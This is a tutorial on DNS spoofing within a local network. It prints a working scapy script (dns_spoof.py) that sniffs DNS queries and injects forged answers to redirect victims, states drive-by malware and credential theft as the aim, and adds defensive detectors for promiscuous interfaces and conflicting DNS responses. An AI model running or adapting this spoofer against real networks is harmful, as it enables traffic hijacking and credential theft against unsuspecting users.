Suppose two people share one local area network: Bob and Eve. Eve wants Bob to visit a malicious web page she has created, so that she can install malware on Bob's computer through a drive-by download, or perhaps display a spoofed site in an attempt to steal Bob's credentials.
(Image taken from the link referenced in this post)
(The test environment for this post is CentOS 6.5 throughout.)
1. Put the attacker machine's NIC into promiscuous mode so that it can capture every packet on the LAN:
ifconfig em1 promisc
Check the NIC mode with: ifconfig em1
The output shows that the NIC is now in promiscuous mode.
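Promiscuous mode is also something a defender can check for on the hosts they manage: the flag that ifconfig sets is IFF_PROMISC (0x100) in the interface's kernel flags, and Linux exposes those flags in /sys/class/net/<iface>/flags. The script below is an added example, not part of the original post; it assumes a Linux sysfs layout and does not depend on ifconfig being installed.

```shell
#!/bin/sh
# Added example (not from the original post): list interfaces whose kernel
# flags include IFF_PROMISC, the bit that "ifconfig em1 promisc" sets.
# Assumes a Linux sysfs layout: /sys/class/net/<iface>/flags holds the
# interface flags as a hex string such as 0x1103.

IFF_PROMISC=0x100   # IFF_PROMISC from <linux/if.h>

# promisc_from_flags HEXFLAGS -> exit status 0 if the promiscuous bit is set
promisc_from_flags() {
    flags="$1"
    [ $(( flags & IFF_PROMISC )) -ne 0 ]
}

# list_promisc_ifaces -> print the name of every promiscuous interface
list_promisc_ifaces() {
    for path in /sys/class/net/*/flags; do
        [ -r "$path" ] || continue
        iface=${path#/sys/class/net/}
        iface=${iface%/flags}
        if promisc_from_flags "$(cat "$path")"; then
            printf '%s\n' "$iface"
        fi
    done
}

list_promisc_ifaces
```

Run it periodically (or from a configuration-management check) and treat any interface it prints, other than one you deliberately configured for a packet-capture sensor, as worth investigating; an interface entering promiscuous mode on an ordinary workstation is a common precursor to the kind of sniffing this post describes.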
2. Write the attack code:
Open the dns_spoof.py script file:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from scapy.all import *
import time
import logging

logger = logging.getLogger('main')
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
# Set the interface for scapy to use
conf.iface = 'br0'
# Set the spoofed response
spoofed_ip = '192.168.28.118'

def send_response(x):
    # Get the requested domain
    req_domain = x[DNS].qd.qname
    logger.info('Found request for ' + req_domain)
    # First, we delete the existing lengths and checksums..
    # We will let Scapy re-create them
    del(x[UDP].len)
    del(x[UDP].chksum)
    del(x[IP].len)
    del(x[IP].chksum)
    # Let's build our response from a copy of the original packet
    response = x.copy()
    # We need to start by changing our response to be "from-ds", or from the access point.
    response.FCfield = 2L
    # Switch the MAC addresses
    #response.addr1, response.addr2 = x.addr2, x.addr1
    response.src, response.dst = x.dst, x.src
    # Switch the IP addresses
    response[IP].src, response[IP].dst = x[IP].dst, x[IP].src
    # Switch the ports
    response.sport, response.dport = x.dport, x.sport
    # Set the DNS flags
    response[DNS].qr = 1L
    response[DNS].ra = 1L
    response[DNS].ancount = 1
    # Let's add on the answer section
    response[DNS].an = DNSRR(
        rrname = req_domain,
        type = 'A',
        rclass = 'IN',
        ttl = 900,
        rdata = spoofed_ip
    )
    # Now, we inject the response!
    sendp(response)
    logger.info('Sent response: ' + req_domain + ' -> ' + spoofed_ip + '\n')

def main():
    logger.info('Starting to intercept [CTRL+C to stop]')
    sniff(prn=lambda x: send_response(x), lfilter=lambda x: x.haslayer(UDP) and x.dport == 53)

if __name__ == "__main__":
    # Make it happen!
    main()
This script captures DNS A-record queries on the LAN.
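From the defender's side, an injected answer like the one dns_spoof.py builds leaves a visible trace on the segment: the client receives two responses for the same transaction id and name (the injected one and, a few milliseconds later, the real resolver's), and the injected frame carries the resolver's IP address but a different source MAC than the gateway's. The following monitor is an added example, not code from the original post or the linked article. It works on already-parsed response records (dicts with src_mac, src_ip, dst_ip, txid, qname, rdata) rather than on raw scapy packets so that it runs offline; the resolver address is the 223.5.5.5 used in the demo, and the MAC addresses and sample responses are constructed for the example.

```python
from collections import defaultdict

# Resolver the LAN clients are configured to use (223.5.5.5, as in the demo).
RESOLVER_IP = '223.5.5.5'

# Constructed sample values (not from the post): the MAC the resolver's
# answers normally arrive from (the gateway) and a second host on the segment.
GATEWAY_MAC = '00:11:22:33:44:01'
OTHER_MAC = '00:11:22:33:44:99'


def find_conflicts(responses, resolver_ip=RESOLVER_IP):
    """Return a list of alert dicts for suspicious DNS responses.

    `responses` is an iterable of parsed response records (dicts with the
    keys src_mac, src_ip, dst_ip, txid, qname and rdata, one A record per
    response), in capture order. Two independent signals are reported:
      - 'mac_mismatch': frames whose IP source is the resolver arrive from
        more than one source MAC address on the segment.
      - 'conflict': two responses for the same (client, txid, name) carry
        different A records, i.e. something answered besides the resolver.
    """
    answers = defaultdict(list)   # (client, txid, qname) -> [(src_mac, rdata)]
    macs_for_resolver = set()
    alerts = []
    for r in responses:
        key = (r['dst_ip'], r['txid'], r['qname'])
        if r['src_ip'] == resolver_ip:
            if macs_for_resolver and r['src_mac'] not in macs_for_resolver:
                alerts.append({'type': 'mac_mismatch', 'qname': r['qname'],
                               'src_mac': r['src_mac'],
                               'known_macs': sorted(macs_for_resolver)})
            macs_for_resolver.add(r['src_mac'])
        for prev_mac, prev_rdata in answers[key]:
            if prev_rdata != r['rdata']:
                alerts.append({'type': 'conflict', 'qname': r['qname'],
                               'txid': r['txid'],
                               'answers': [(prev_mac, prev_rdata),
                                           (r['src_mac'], r['rdata'])]})
        answers[key].append((r['src_mac'], r['rdata']))
    return alerts


# Constructed capture: one clean lookup, then a lookup that receives an
# injected answer (192.168.28.118, the spoofed_ip from the post) from another
# host before the resolver's real answer arrives. 203.0.113.0/24 is the
# TEST-NET-3 documentation range, used here as a stand-in for real answers.
SAMPLE_RESPONSES = [
    {'src_mac': GATEWAY_MAC, 'src_ip': RESOLVER_IP, 'dst_ip': '192.168.28.50',
     'txid': 0x1a2b, 'qname': 'example.com.', 'rdata': '203.0.113.5'},
    {'src_mac': OTHER_MAC, 'src_ip': RESOLVER_IP, 'dst_ip': '192.168.28.50',
     'txid': 0x3c4d, 'qname': 'www.baidu.com.', 'rdata': '192.168.28.118'},
    {'src_mac': GATEWAY_MAC, 'src_ip': RESOLVER_IP, 'dst_ip': '192.168.28.50',
     'txid': 0x3c4d, 'qname': 'www.baidu.com.', 'rdata': '203.0.113.10'},
]


if __name__ == '__main__':
    for alert in find_conflicts(SAMPLE_RESPONSES):
        print(alert)
```

Feeding this from a live capture means parsing the Ethernet, IP, UDP and DNS layers into those six fields (scapy's sniff with a "udp and src port 53" filter is one way), and the same logic extends to records other than A. The mac_mismatch signal is the cheaper one to deploy, since it needs only a known-good gateway MAC; the conflict signal is more robust because it fires even when the injected frame is crafted to match the gateway's MAC.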
3. Demo: (for convenience, the local DNS server was set to 223.5.5.5)
Testing with the command dig @223.5.5.5 www.baidu.com gives the following:
This post follows the approach from http://jordan-wright.com/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/. Using that script as-is causes problems, so I made some adjustments; the experiment succeeded in a LAN environment.
Link to the translated article: http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack